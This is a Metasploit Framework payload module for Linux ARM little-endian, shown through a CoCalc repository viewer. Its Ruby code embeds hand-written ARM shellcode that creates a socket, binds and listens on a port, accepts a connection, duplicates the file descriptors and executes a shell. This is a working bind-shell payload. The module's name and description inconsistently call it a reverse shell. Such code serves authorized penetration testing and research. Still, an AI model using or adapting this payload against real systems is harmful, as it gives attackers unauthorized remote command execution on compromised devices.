CoCalc -- shell_bind

GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/payloads/singles/linux/armle/shell_bind_tcp.rb
¹⁹⁶¹² views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
module MetasploitModule
7
  CachedSize = 208
8

9
  include Msf::Payload::Single
10
  include Msf::Payload::Linux::Armle::Prepends
11
  include Msf::Sessions::CommandShellOptions
12

13
  def initialize(info = {})
14
    super(
15
      merge_info(
16
        info,
17
        'Name' => 'Linux Command Shell, Reverse TCP Inline',
18
        'Version' => '',
19
        'Description' => 'Connect to target and spawn a command shell',
20
        'Author' => ['civ', 'hal'],
21
        'License' => MSF_LICENSE,
22
        'Platform' => 'linux',
23
        'Arch' => ARCH_ARMLE,
24
        'Handler' => Msf::Handler::BindTcp,
25
        'Session' => Msf::Sessions::CommandShellUnix,
26
        'Payload' => {
27
          'Offsets' =>
28
                  {
29
                    'RHOST' => [ 172, 'ADDR' ],
30
                    'LPORT' => [ 170, 'n' ]
31
                  },
32
          'Payload' =>
33
                       [
34
                         # socket
35
                         0xe3a00002, # mov     r0, #2
36
                         0xe3a01001, # mov     r1, #1
37
                         0xe3a02006, # mov     r2, #6
38
                         0xe3a07001, # mov     r7, #1
39
                         0xe1a07407, # lsl     r7, r7, #8
40
                         0xe2877019, # add     r7, r7, #25
41
                         0xef000000, # svc     0x00000000
42
                         0xe1a06000, # mov     r6, r0
43

44
                         # bind
45
                         0xe28f1080, # 1dr     r1, pc, #128
46
                         0xe3a02010, # mov     r2, #16
47
                         0xe3a07001, # mov     r7, #1
48
                         0xe1a07407, # lsl     r7, r7, #8
49
                         0xe287701a, # add     r7, r7, #26
50
                         0xef000000, # svc     0x00000000
51

52
                         # listen
53
                         0xe1a00006, # mov     r0, r6
54
                         0xe3a07001, # mov     r7, #1
55
                         0xe1a07407, # lsl     r7, r7, #8
56
                         0xe287701c, # add     r7, r7, #28
57
                         0xef000000, # svc     0x00000000
58

59
                         # accept
60
                         0xe1a00006, # mov     r0, r6
61
                         0xe0411001, # sub     r1, r1, r1
62
                         0xe0422002, # sub     r2, r2, r2
63
                         0xe3a07001, # mov     r7, #1
64
                         0xe1a07407, # lsl     r7, r7, #8
65
                         0xe287701d, # add     r7, r7, #29
66
                         0xef000000, # svc     0x00000000
67

68
                         # dup
69
                         0xe1a06000, # mov     r6, r0
70
                         0xe3a01002, # mov     r1, #2
71
                         0xe1a00006, # mov     r0, r6
72
                         0xe3a0703f, # mov     r7, #63 ; 0x3f
73
                         0xef000000, # svc     0x00000000
74
                         0xe2511001, # subs    r1, r1, #1
75
                         0x5afffffa, # bpl     8c <.text+0x8c>
76

77
                         # execve("/system/bin/sh", args, env)
78
                         0xe28f0024, # add     r0, pc, #36     ; 0x24
79
                         0xe0244004, # eor     r4, r4, r4
80
                         0xe92d0010, # push    {r4}
81
                         0xe1a0200d, # mov     r2, sp
82
                         0xe28f4024, # add     r4, pc, #36     ; 0x10
83
                         0xe92d0010, # push    {r4}
84
                         0xe1a0100d, # mov     r1, sp
85
                         0xe3a0700b, # mov     r7, #11 ; 0xb
86
                         0xef000000, # svc     0x00000000
87

88
                         # <af>:
89
                         0x04290002, # .word   0x5c110002 @ port: 4444 , sin_fam = 2
90
                         0x0101a8c0, # .word   0x0101a8c0 @ ip: 192.168.1.1
91

92
                         # <shell>:
93
                         0x00000000, # .word   0x00000000 ; the shell goes here!
94
                         0x00000000, # .word   0x00000000
95
                         0x00000000, # .word   0x00000000
96
                         0x00000000, # .word   0x00000000
97

98
                         # <arg>:
99
                         0x00000000, # .word   0x00000000 ; the args!
100
                         0x00000000, # .word   0x00000000
101
                         0x00000000, # .word   0x00000000
102
                         0x00000000, # .word   0x00000000
103
                       ].pack('V*')
104
        }
105
      )
106
    )
107

108
    # Register command execution options
109
    register_options(
110
      [
111
        OptString.new('SHELL', [ true, 'The shell to execute.', '/bin/sh' ]),
112
        OptString.new('ARGV0', [ false, 'argv[0] to pass to execve', 'sh' ]) # mostly used for busybox
113
      ]
114
    )
115
  end
116

117
  def generate(_opts = {})
118
    p = super
119

120
    sh = datastore['SHELL']
121
    if sh.length >= 16
122
      raise ArgumentError, 'The specified shell must be less than 16 bytes.'
123
    end
124

125
    p[176, sh.length] = sh
126

127
    arg = datastore['ARGV0']
128
    if arg
129
      if arg.length >= 16
130
        raise ArgumentError, 'The specified argv[0] must be less than 16 bytes.'
131
      end
132

133
      p[192, arg.length] = arg
134
    end
135

136
    p
137
  end
138
end
139

140
Product

Resources

Company
